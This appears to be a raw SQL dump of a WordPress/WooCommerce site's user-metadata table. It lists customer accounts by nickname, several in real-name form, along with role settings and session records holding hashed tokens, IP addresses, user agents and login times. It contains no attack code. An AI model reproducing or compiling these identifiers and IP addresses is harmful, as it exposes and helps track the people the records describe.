INSERT INTO `wp_usermeta` VALUES (10057, 618, 'session_tokens', 'a:1:{s:64:"73c5ae261ca99d7bd7175e161542d79890b23d5a9c6d88215ed5bcee0fd644aa";a:4:{s:10:"expiration";i:1492450365;s:2:"ip";s:13:"64.251.64.218";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1491240765;}}'); 
INSERT INTO `wp_usermeta` VALUES (10058, 619, 'nickname', 'kevin.s.thompson-1'); 
INSERT INTO `wp_usermeta` VALUES (10059, 619, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10060, 619, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10061, 619, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (10062, 619, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10063, 619, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (10064, 619, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (10065, 619, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (10066, 619, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10067, 619, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (10068, 619, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (10069, 619, '_yoast_wpseo_profile_updated', '1491250699'); 
INSERT INTO `wp_usermeta` VALUES (10070, 619, 'session_tokens', 'a:1:{s:64:"313e09b4eb1628684b589927a942bde0600e1c6af21ff3d0bc940266949ab413";a:4:{s:10:"expiration";i:1492460307;s:2:"ip";s:13:"165.225.34.90";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1491250707;}}'); 
INSERT INTO `wp_usermeta` VALUES (10071, 620, 'nickname', 'veronica.garibay-barajas'); 
INSERT INTO `wp_usermeta` VALUES (10072, 620, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10073, 620, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10074, 620, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (10075, 620, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10076, 620, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (10077, 620, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (10078, 620, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (10079, 620, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10080, 620, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (10081, 620, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (10082, 620, '_yoast_wpseo_profile_updated', '1491253523'); 
INSERT INTO `wp_usermeta` VALUES (10083, 620, 'session_tokens', 'a:1:{s:64:"063f5a7c2492d0d161c5ade71f207bd70aef572b04e2e788d413250e3d4b93e3";a:4:{s:10:"expiration";i:1492463135;s:2:"ip";s:13:"137.78.94.216";s:2:"ua";s:76:"Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko";s:5:"login";i:1491253535;}}'); 
INSERT INTO `wp_usermeta` VALUES (10084, 621, 'nickname', 'douglas.a.clark'); 
INSERT INTO `wp_usermeta` VALUES (10085, 621, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10086, 621, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10087, 621, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (10088, 621, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10089, 621, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (10090, 621, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (10091, 621, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (10092, 621, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10093, 621, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (10094, 621, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (10095, 621, '_yoast_wpseo_profile_updated', '1491253753'); 
INSERT INTO `wp_usermeta` VALUES (10096, 621, 'session_tokens', 'a:1:{s:64:"108022ab32705f5f3db4b4d3f638b43ae023c2e010577515303211717af123ac";a:4:{s:10:"expiration";i:1492463365;s:2:"ip";s:13:"192.31.106.35";s:2:"ua";s:73:"Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1491253765;}}'); 
INSERT INTO `wp_usermeta` VALUES (10097, 622, 'nickname', 'makajm'); 
INSERT INTO `wp_usermeta` VALUES (10098, 622, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10099, 622, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10100, 622, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (10101, 622, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10102, 622, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (10103, 622, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (10104, 622, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (10105, 622, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10106, 622, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (10107, 622, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (10108, 622, '_yoast_wpseo_profile_updated', '1491316289'); 
INSERT INTO `wp_usermeta` VALUES (10109, 622, 'session_tokens', 'a:1:{s:64:"cd0b05eaee641c772bd074609cb524800cac3cad49d993795345f577282d301f";a:4:{s:10:"expiration";i:1492525899;s:2:"ip";s:14:"209.131.71.178";s:2:"ua";s:108:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36";s:5:"login";i:1491316299;}}'); 
INSERT INTO `wp_usermeta` VALUES (10110, 623, 'nickname', 'bgordon'); 
INSERT INTO `wp_usermeta` VALUES (10111, 623, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10112, 623, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10113, 623, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (10114, 623, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10115, 623, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (10116, 623, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (10117, 623, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (10118, 623, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10119, 623, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (10120, 623, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (10121, 623, '_yoast_wpseo_profile_updated', '1491331288'); 
INSERT INTO `wp_usermeta` VALUES (10122, 623, 'session_tokens', 'a:1:{s:64:"ae1d14baf5873d381ce7f3eece2d43c9361230ef020b2dd909ff9de5abd14247";a:4:{s:10:"expiration";i:1492540898;s:2:"ip";s:11:"74.95.18.34";s:2:"ua";s:72:"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0";s:5:"login";i:1491331298;}}'); 
INSERT INTO `wp_usermeta` VALUES (10123, 623, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (10124, 624, 'nickname', 'SDSsupport5'); 
INSERT INTO `wp_usermeta` VALUES (10125, 624, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10126, 624, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10127, 624, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (10128, 624, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10129, 624, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (10130, 624, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (10131, 624, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (10132, 624, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10133, 624, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (10134, 624, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (10135, 624, '_yoast_wpseo_profile_updated', '1491384625'); 
INSERT INTO `wp_usermeta` VALUES (10136, 624, 'session_tokens', 'a:1:{s:64:"c5b65f4bd6df6ffd974151c1ae2d53f47f5129280efb120bb7f9011d5d510250";a:4:{s:10:"expiration";i:1492594241;s:2:"ip";s:11:"203.32.4.16";s:2:"ua";s:101:"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36";s:5:"login";i:1491384641;}}'); 
INSERT INTO `wp_usermeta` VALUES (10137, 625, 'nickname', 'don'); 
INSERT INTO `wp_usermeta` VALUES (10138, 625, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10139, 625, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10140, 625, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (10141, 625, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10142, 625, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (10143, 625, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (10144, 625, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (10145, 625, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10146, 625, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (10147, 625, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (10148, 625, '_yoast_wpseo_profile_updated', '1491399665'); 
INSERT INTO `wp_usermeta` VALUES (10150, 626, 'nickname', 'mameacham'); 
INSERT INTO `wp_usermeta` VALUES (10151, 626, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10152, 626, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10153, 626, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (10154, 626, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10155, 626, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (10156, 626, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (10157, 626, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (10158, 626, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10159, 626, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (10160, 626, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (10161, 626, '_yoast_wpseo_profile_updated', '1491400380'); 
INSERT INTO `wp_usermeta` VALUES (10162, 626, 'session_tokens', 'a:1:{s:64:"c7c7f0b5d12076e539cc725716b7eed7d395512074532c24c5220d8be59963db";a:4:{s:10:"expiration";i:1492609991;s:2:"ip";s:14:"50.200.101.242";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1491400391;}}'); 
INSERT INTO `wp_usermeta` VALUES (10163, 627, 'nickname', 'matt.moseley'); 
INSERT INTO `wp_usermeta` VALUES (10164, 627, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10165, 627, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10166, 627, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (10167, 627, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10168, 627, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (10169, 627, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (10170, 627, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (10171, 627, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10172, 627, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (10173, 627, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (10174, 627, '_yoast_wpseo_profile_updated', '1491403281'); 
INSERT INTO `wp_usermeta` VALUES (10175, 627, 'session_tokens', 'a:1:{s:64:"87563f605d0be5ef03467a02f6153d85455e25563329e943900b56c34be7b7bd";a:4:{s:10:"expiration";i:1492612890;s:2:"ip";s:14:"104.129.196.56";s:2:"ua";s:150:"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729)";s:5:"login";i:1491403290;}}'); 
INSERT INTO `wp_usermeta` VALUES (10176, 628, 'nickname', 'kelley.blackert'); 
INSERT INTO `wp_usermeta` VALUES (10177, 628, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10178, 628, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10179, 628, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (10180, 628, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10181, 628, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (10182, 628, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (10183, 628, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (10184, 628, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10185, 628, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (10186, 628, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (10187, 628, '_yoast_wpseo_profile_updated', '1491415256'); 
INSERT INTO `wp_usermeta` VALUES (10188, 628, 'session_tokens', 'a:1:{s:64:"911773146bcf6c85a79f98b944d32dc2c36248e469d5c077881d19bcf9fefa7b";a:4:{s:10:"expiration";i:1492624864;s:2:"ip";s:10:"203.6.69.2";s:2:"ua";s:102:"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)";s:5:"login";i:1491415264;}}'); 
INSERT INTO `wp_usermeta` VALUES (10189, 629, 'nickname', 'alfredo.camacho'); 
INSERT INTO `wp_usermeta` VALUES (10190, 629, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10191, 629, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10192, 629, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (10193, 629, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10194, 629, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (10195, 629, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (10196, 629, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (10197, 629, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10198, 629, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (10199, 629, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (10200, 629, '_yoast_wpseo_profile_updated', '1491482502'); 
INSERT INTO `wp_usermeta` VALUES (10201, 629, 'session_tokens', 'a:1:{s:64:"6763dde0e896e6fb0469590f502c75aa216e5c0f843a567a749ed4efa1e183f5";a:4:{s:10:"expiration";i:1492692111;s:2:"ip";s:11:"132.3.17.79";s:2:"ua";s:73:"Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1491482511;}}'); 
INSERT INTO `wp_usermeta` VALUES (10202, 630, 'nickname', 'mark.fields'); 
INSERT INTO `wp_usermeta` VALUES (10203, 630, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10204, 630, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10205, 630, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (10206, 630, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10207, 630, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (10208, 630, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (10209, 630, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (10210, 630, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10211, 630, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (10212, 630, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (10213, 630, '_yoast_wpseo_profile_updated', '1491484472'); 
INSERT INTO `wp_usermeta` VALUES (10214, 630, 'session_tokens', 'a:1:{s:64:"9611a7d91acaa3dbf159c9d6532a90ab15ee7c0c19bd021dc0509da564137594";a:4:{s:10:"expiration";i:1492694082;s:2:"ip";s:12:"66.37.66.186";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1491484482;}}'); 
INSERT INTO `wp_usermeta` VALUES (10215, 630, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (10216, 631, 'nickname', 'gendrikat'); 
INSERT INTO `wp_usermeta` VALUES (10217, 631, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10218, 631, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10219, 631, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (10220, 631, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10221, 631, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (10222, 631, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (10223, 631, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (10224, 631, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10225, 631, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (10226, 631, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (10227, 631, '_yoast_wpseo_profile_updated', '1491486000'); 
INSERT INTO `wp_usermeta` VALUES (10228, 631, 'session_tokens', 'a:1:{s:64:"4ea9ab6f2ff774bfbc99af4267a4a406cf9b44c230b469d28429b97060d1ead5";a:4:{s:10:"expiration";i:1492695609;s:2:"ip";s:14:"71.187.199.148";s:2:"ua";s:109:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36";s:5:"login";i:1491486009;}}'); 
INSERT INTO `wp_usermeta` VALUES (10229, 632, 'nickname', 'amy.aupperle'); 
INSERT INTO `wp_usermeta` VALUES (10230, 632, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10231, 632, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10232, 632, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (10233, 632, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10234, 632, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (10235, 632, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (10236, 632, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (10237, 632, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10238, 632, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (10239, 632, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (10240, 632, '_yoast_wpseo_profile_updated', '1491490057'); 
INSERT INTO `wp_usermeta` VALUES (10241, 632, 'session_tokens', 'a:1:{s:64:"b73228394c699d9e4cc6523623656e06dcc22449693829627973e19e7d0f8410";a:4:{s:10:"expiration";i:1492699667;s:2:"ip";s:13:"204.155.22.30";s:2:"ua";s:114:"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36";s:5:"login";i:1491490067;}}'); 
INSERT INTO `wp_usermeta` VALUES (10242, 633, 'nickname', 'pkt'); 
INSERT INTO `wp_usermeta` VALUES (10243, 633, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10244, 633, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10245, 633, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (10246, 633, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10247, 633, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (10248, 633, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (10249, 633, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (10250, 633, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10251, 633, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (10252, 633, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (10253, 633, '_yoast_wpseo_profile_updated', '1491502420'); 
INSERT INTO `wp_usermeta` VALUES (10254, 633, 'session_tokens', 'a:1:{s:64:"a45668f66d059a78effb21151ad7eda70334dfc6a45b068076c586ce05407dd0";a:4:{s:10:"expiration";i:1492712030;s:2:"ip";s:15:"198.202.125.142";s:2:"ua";s:72:"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0";s:5:"login";i:1491502430;}}'); 
INSERT INTO `wp_usermeta` VALUES (10255, 634, 'nickname', 'keenan'); 
INSERT INTO `wp_usermeta` VALUES (10256, 634, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10257, 634, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10258, 634, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (10259, 634, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10260, 634, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (10261, 634, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (10262, 634, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (10263, 634, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10264, 634, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (10265, 634, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (10266, 634, '_yoast_wpseo_profile_updated', '1491505876'); 
INSERT INTO `wp_usermeta` VALUES (10267, 634, 'session_tokens', 'a:2:{s:64:"377b4d5ea578a3c711f7d4862f4776ef154285f8be61c26d40a3c7da00ee9d18";a:4:{s:10:"expiration";i:1492715483;s:2:"ip";s:13:"66.91.139.230";s:2:"ua";s:109:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36";s:5:"login";i:1491505883;}s:64:"169aafeb74501033c6af4efd9a1f7e4669961fab7a0bd34e5680e63d93e4e661";a:4:{s:10:"expiration";i:1492715509;s:2:"ip";s:13:"66.91.139.230";s:2:"ua";s:109:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36";s:5:"login";i:1491505909;}}'); 
INSERT INTO `wp_usermeta` VALUES (10268, 634, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (10269, 635, 'nickname', 'johnr'); 
INSERT INTO `wp_usermeta` VALUES (10270, 635, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10271, 635, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10272, 635, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (10273, 635, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10274, 635, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (10275, 635, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (10276, 635, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (10277, 635, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10278, 635, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (10279, 635, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (10280, 635, '_yoast_wpseo_profile_updated', '1491507167'); 
INSERT INTO `wp_usermeta` VALUES (10281, 635, 'session_tokens', 'a:1:{s:64:"2d0d7f425b1817f32315368fbb0c1183e547ecff0431758554219d458368a5eb";a:4:{s:10:"expiration";i:1492716781;s:2:"ip";s:13:"50.78.140.221";s:2:"ua";s:72:"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0";s:5:"login";i:1491507181;}}'); 
INSERT INTO `wp_usermeta` VALUES (10282, 636, 'nickname', 'michael.jakubinek'); 
INSERT INTO `wp_usermeta` VALUES (10283, 636, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10284, 636, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10285, 636, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (10286, 636, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10287, 636, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (10288, 636, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (10289, 636, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (10290, 636, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10291, 636, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (10292, 636, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (10293, 636, '_yoast_wpseo_profile_updated', '1491582869'); 
INSERT INTO `wp_usermeta` VALUES (10294, 636, 'session_tokens', 'a:1:{s:64:"42f76f97ba75dd9d312c04f3d23ab2733997d47f45691eba2e63788e1cba817a";a:4:{s:10:"expiration";i:1492792485;s:2:"ip";s:15:"132.246.118.194";s:2:"ua";s:61:"Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1491582885;}}'); 
INSERT INTO `wp_usermeta` VALUES (10296, 637, 'nickname', 'zrtingen'); 
INSERT INTO `wp_usermeta` VALUES (10297, 637, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10298, 637, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10299, 637, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (10300, 637, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10301, 637, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (10302, 637, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (10303, 637, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (10304, 637, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10305, 637, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (10306, 637, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (10307, 637, '_yoast_wpseo_profile_updated', '1491623650'); 
INSERT INTO `wp_usermeta` VALUES (10310, 638, 'nickname', 'Cameronzuzula'); 
INSERT INTO `wp_usermeta` VALUES (10311, 638, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10312, 638, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10313, 638, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (10314, 638, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10315, 638, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (10316, 638, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (10317, 638, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (10318, 638, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10319, 638, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (10320, 638, 'wp_user_level', '0'); 
